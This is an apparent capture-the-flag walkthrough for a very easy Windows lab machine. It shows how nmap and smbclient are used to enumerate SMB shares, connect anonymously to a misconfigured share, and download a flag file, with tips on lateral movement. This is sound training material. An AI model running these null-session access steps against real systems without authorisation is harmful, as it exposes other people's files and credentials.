⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing
Dancing focuses on SMB (Server Message Block) — the protocol Windows uses for file sharing, printer sharing, and inter-process communication. Misconfigured SMB shares with null or anonymous authentication are among the most common entry points in Windows-heavy environments. This machine teaches you to enumerate shares, identify accessible ones, and extract files without credentials.
Tools: nmap · smbclient · Difficulty: Very Easy · OS: Windows
01 — What You Will Learn
| Skill | Why it matters |
| SMB share enumeration | Listing available shares is always step one on Windows targets |
| Null session authentication | Connecting without credentials to probe what's exposed |
| smbclient navigation | The go-to SMB client on Linux for manual share access |
| Recursive file listing | Finding sensitive files buried in share subdirectories |
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 10 microsoft-ds
What you're seeing: ports 135, 139, and 445 are the classic SMB fingerprint on Windows. Port 445 is the primary SMB port (direct TCP, no NetBIOS wrapper). The OS detection confirms Windows 10.
ℹ Port 139 is NetBIOS over TCP — the older SMB transport. Port 445 is the modern direct-hosted SMB. Most tools default to 445. If 445 is filtered, try 139 as a fallback.
03 — SMB Share Enumeration
List all available shares using a null session (no credentials). The -L flag lists shares, -N suppresses the password prompt.
List shares
smbclient -L 10.129.x.x -N
Output
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
| Share | Type | Notes |
| ADMIN$ | Default admin | Maps to C:\Windows — requires admin credentials |
| C$ | Default admin | Full drive access — requires admin credentials |
| IPC$ | IPC | Used for named pipes and RPC — often allows null sessions for enumeration |
| WorkShares | Custom | Non-default share — always investigate these first |
ℹ Default shares ending in $ are hidden administrative shares. Custom shares without a trailing $ are explicitly created by administrators and are often misconfigured.
04 — Accessing the Share
Connect to WorkShares
smbclient \\\\10.129.x.x\\WorkShares -N
Enumerate the share contents
smb: \> ls
. D
.. D
Amy.J D
James.P D
smb: \> cd James.P
smb: \James.P\> ls
flag.txt A 32
smb: \James.P\> get flag.txt
smb: \James.P\> exit
Read locally
cat flag.txt
✓ Submit the flag string to complete the machine.
05 — smbclient Command Reference
| Command | What it does |
| ls / dir | List contents of current directory |
| cd <dir> | Change directory on the remote share |
| get <file> | Download a file to your local current directory |
| mget * | Download all files recursively |
| put <file> | Upload a file (if write access exists) |
| recurse ON | Enable recursive operations |
| prompt OFF | Disable per-file prompts for mget/mput |
| exit / quit | Close the SMB session |
06 — Key Takeaways
SMB null sessions and misconfigured share permissions are a top-three finding in almost every internal Windows network assessment. Always enumerate shares before moving on.
| Concept | Real-world relevance |
| Null session enumeration | Test every SMB host with -N before attempting authenticated access |
| Custom shares = soft targets | Admin-created shares frequently have overly permissive ACLs |
| User directory exposure | Finding user home folders on a share often leads to credentials, SSH keys, or scripts |
| Lateral movement prep | SMB access is a key stepping stone — write access enables PsExec-style code execution |